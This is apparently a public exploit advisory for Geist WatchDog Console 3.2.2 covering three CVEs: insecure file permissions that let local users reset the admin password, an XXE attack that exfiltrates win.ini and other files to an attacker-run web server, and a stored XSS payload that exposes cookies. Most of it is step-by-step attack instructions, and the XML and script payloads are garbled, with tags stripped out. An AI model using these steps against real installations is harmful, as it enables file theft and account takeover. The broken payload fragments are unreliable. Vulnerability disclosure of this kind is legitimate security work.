# Exploit Author: bzyo # CVE: CVE-2018-10077, CVE-2018-10078, CVE-2018-10079 # Twitter: @bzyo_ # Exploit Title: Geist WatchDog Console 3.2.2 - Multiple Vulnerabilities # Date: 04-17-18 # Vulnerable Software: WatchDog Console - 3.2.2 # Vendor Homepage: http://www.itwatchdogs.com/ # Version: 3.2.2 # Software Link: http://www.itwatchdogs.com/userfiles/file/firmware/Console/WatchDogConsoleInstaller_v3.2.2.exe # Tested On: Windows 7 x86 Description ----------------------------------------------------------------- WatchDog Console suffers from multiple vulnerabilities: # CVE-2018-10077 Authenticated XML External Entity (XXE) # CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) # CVE-2018-10079 Insecure File Permissions Prerequisites ----------------------------------------------------------------- To successfully exploit these vulnerabilities, an attacker must already have access to a system running WatchDog Console using a low-privileged user account Proof of Concepts ----------------------------------------------------------------- ### CVE-2018-10079 Insecure File Permissions ### By default, WatchDog Console 3.2.2 installs all configuration data at 'C:\ProgramData\WatchDog Console' and gives 'Authenticated Users' group Modify permissions C:\>icacls "c:\ProgramData\WatchDog Console" c:\ProgramData\WatchDog Console NT AUTHORITY\Authenticated Users:(OI)(CI)(M,DC) This allows any local user of the system the ability to reset the application admin password by generating a password using the PHP md5() function and updating the config.xml file. It also provides the ability to add data to servers.xml for both CVE-2018-10078 and CVE-2018-10079 or through the application interface ### CVE-2018-10077 Authenticated XML External Entity (XXE) ### With authenticated admin access to the application or local access to the system, a user has the ability to read system files remotely through XXE On attacking machine - Create data.xml with following contents in apache root and start apache listening on 80 %sp; %param1; ]> &exfil; - Create evil.xml with the following contents anywhere "> - Start python simple http server in same directory as evil.xml, listening on 8080 python -m SimpleHTTPServer 8080 On victim machine (1 of 2 ways) 1. With admin access to application console, add attacking server IP address under servers tab or 2. With local access to system - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: - restart system On attacking machine - Contents of 'win.ini' is outputted to console - evil.xml can be updated to read other sensitive files (tested reading file from admin desktop) ### CVE-2018-10078 Authenticated Stored Cross Site Scripting (XSS) ### This application suffers from authenticated XSS on several inputs (1 of 2 ways) 1. With admin access to application console, under servers tab - add dummy IP in server name filed - add "> into server description or 2. With local access to system - update 'C:\ProgramData\WatchDog Console\servers.xml file' with following: " selEmail="True" Username="1" Password="1" left="400" top="180" /> - restart system 3. popup with cookie appears when browsing from Overview, Dashboard, and Server tabs. Remains after reboot. Timeline --------------------------------------------------------------------- 04-14-18: Vendor notified of vulnerabilities 04-16-18: Vendor responded "Thank you for bringing this to our attention. The product has now been End-of-life for several years and is no longer receiving updates." 04-17-18: Submitted public disclosure